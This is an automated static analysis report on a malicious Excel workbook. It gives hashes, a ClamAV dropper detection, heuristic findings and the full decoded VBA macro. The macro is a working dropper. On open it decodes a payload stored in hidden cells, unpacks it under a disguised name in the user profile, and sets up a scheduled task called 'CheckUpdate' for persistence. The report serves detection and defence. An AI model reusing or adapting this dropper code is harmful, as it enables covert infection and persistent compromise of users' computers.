Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 20b3d046ed617b73…

MALICIOUS

Office (OLE)

433.0 KB Created: 2015-06-05 18:17:20 Authoring application: Microsoft Excel First seen: 2020-05-14
MD5: 8beb7bb883a091d2690982d9d46d3bb4 SHA-1: 61a4744a5325f8311ed0d406ea966c079b3b62bd SHA-256: 20b3d046ed617b7336156a64a0550d416afdd80a2c32ce332be6bbfd4829832c
236 Risk Score

Heuristics 7

  • ClamAV: Xls.Dropper.Agent-7578024-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Xls.Dropper.Agent-7578024-0
  • VBA macros detected medium 5 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER
    Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
    Matched line in script
            Set f = CreateObject("Scripting.FileSystemObject")
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
            Set f = CreateObject("Scripting.FileSystemObject")
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
  • Workbook_Open macro low OLE_VBA_WBOPEN
    Workbook_Open macro
    Matched line in script
    Private Sub Workbook_open()
  • Environ() call (env variable access) low OLE_VBA_ENVIRON
    Environ() call (env variable access)
    Matched line in script
        un = Environ("us" & "er" & "name")

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 5746 bytes
SHA-256: 53c14314dd7ee32b7caf2a857e484801086b81f5bd18b5511e700088211b8fad
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub Workbook_open()
    'Dim cellRange As Range
    'Set cellRange = ActiveSheet.Range("B5:F5")
    'For i = 1 To 5
    ' MsgBox cellRange.Cells(1, i).Value
    'Next
    
    Dim name As String
    Dim save As String
    Dim savep As String
    Dim un As String
    un = Environ("us" & "er" & "name")
    savep = "C:\" & "Users\" & un & "\vals"
    name = "firefox"
    
    Dim lineText As String
    lineText = ActiveWorkbook.Sheets("Sheet1 ").Range("Z100").Value
    lineText = lineText & ActiveWorkbook.Sheets("Sheet1 ").Range("Z101").Value
    lineText = lineText & ActiveWorkbook.Sheets("Sheet1 ").Range("Z102").Value
    lineText = lineText & ActiveWorkbook.Sheets("Sheet1 ").Range("Z103").Value
    lineText = lineText & ActiveWorkbook.Sheets("Sheet1 ").Range("Z104").Value
    lineText = lineText & ActiveWorkbook.Sheets("Sheet1 ").Range("Z105").Value
    lineText = lineText & ActiveWorkbook.Sheets("Sheet1 ").Range("Z106").Value
    lineText = lineText & ActiveWorkbook.Sheets("Sheet1 ").Range("Z107").Value
    lineText = lineText & ActiveWorkbook.Sheets("Sheet1 ").Range("Z108").Value
    lineText = lineText & ActiveWorkbook.Sheets("Sheet1 ").Range("Z109").Value
    lineText = lineText & ActiveWorkbook.Sheets("Sheet1 ").Range("Z110").Value
    lineText = lineText & ActiveWorkbook.Sheets("Sheet1 ").Range("Z111").Value
    'example1
    Dim lst As Long
    Dim counter As Long
    Dim length As Long
    length = 1
    lst = Len(lineText)
    Dim dec() As Byte
    'resize to n means n+1 byte
    ReDim Preserve dec(lst / 2 - 1)
    counter = 1
    While counter < lst
        dec(counter \ 2) = Asc(Mid(lineText, counter, length)) - 67 + (Asc(Mid(lineText, counter + 1, length)) - 67) * 16
        counter = counter + 2
    Wend
    
    save = "Client" & " update." & Mid(name, 4, 1) & Mid(name, 7, 1) & Mid(name, 4, 1)
    'example2
    If Application.MouseAvailable Then
        Set f = CreateObject("Scripting.FileSystemObject")
        If Not f.FileExists(savep & "\" & save) Then
            If Dir(savep, vbDirectory) = "" Then
                On Error Resume Next
                MkDir savep
            End If
            
            Dim fileNo As Integer
            fileNo = FreeFile
            On Error Resume Next
            Open Environ("Temp") & "\testfile.zip" For Binary Lock Read Write As #fileNo
                Put #fileNo, 1, dec
            Close #fileNo
            
            'unz
            Set SA = CreateObject("Shell.Application")
            SA.Namespace(savep & "\").CopyHere SA.Namespace(Environ("Temp") & "\testfile.zip").items, 20
            
            c = crtt(savep, save, un)
        End If
        
        
        ActiveWorkbook.Sheets("Sheet1").Visible = xlSheetVisible
        ActiveWorkbook.Sheets("Sheet1 ").Visible = xlSheetHidden
        'ActiveWorkbook.save
        
    End If
End Sub

Function crtt(savep, save, un)
    Dim dom As String
    dom = Environ("user" & "domain")
    Set s = CreateObject(inv("ivres.elude"))
    'its important
    Call s.Connect
    'not important
    Set f = s.getFolder("\")
    Set n = s.NewTask(0)
    'it is not me
    Set r = n.RegistrationInfo
    r.Author = "MS"
    'and may not
    r.Description = "CheckUpdate"
    Set p = n.Principal
    p.LogonType = 3
    'hehehehe
    With n.settings
        .Enabled = True
        .runonlyifidle = False
        .multipleinstances = 0
        .allowdemandstart = True
        .StartWhenAvailable = True
        .ExecutionTimeLimit = "P20D"
    End With
    '1 for tie trigger, 9 for at logon
    Set t = n.triggers.Create(1)
    t.Enabled = True
    t.ID = "TID"
    '4 min from now
    t.startBoundary = XmlTime(DateAdd("n", 4, Now()))
    Set t2 = n.triggers.Create(9)
    t2.Enabled = True
    t2.ID = "T2ID"
    t2.UserId = dom & "\" & un
    
    Set a = n.Actions.Create(0)
    a.Path = savep & "\" & save
    a.Arguments = "..."
    ' and in the now we can
    Call f.RegisterTaskDefinition("CheckUpdate", n, 6, , , 3)
    
End Function
Function inv(x As String)
    Dim a As String
    Dim counter As Integer
    a = ""
    counter = Len(x)
    While counter >= 1
        a = a + Mid(x, counter, 1)
        counter = counter - 1
    Wend
    inv = "Sch" & a & "ce"
End Function
Function XmlTime(t)
    Dim cSecond, cMinute, CHour, cDay, cMonth, cYear
    Dim tTime, tDate

    cSecond = "0" & Second(t)
    cMinute = "0" & Minute(t)
    CHour = "0" & Hour(t)
    cDay = "0" & Day(t)
    cMonth = "0" & Month(t)
    cYear = Year(t)

    tTime = Right(CHour, 2) & ":" & Right(cMinute, 2) & ":" & Right(cSecond, 2)
    tDate = cYear & "-" & Right(cMonth, 2) & "-" & Right(cDay, 2)
    XmlTime = tDate & "T" & tTime
End Function

Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True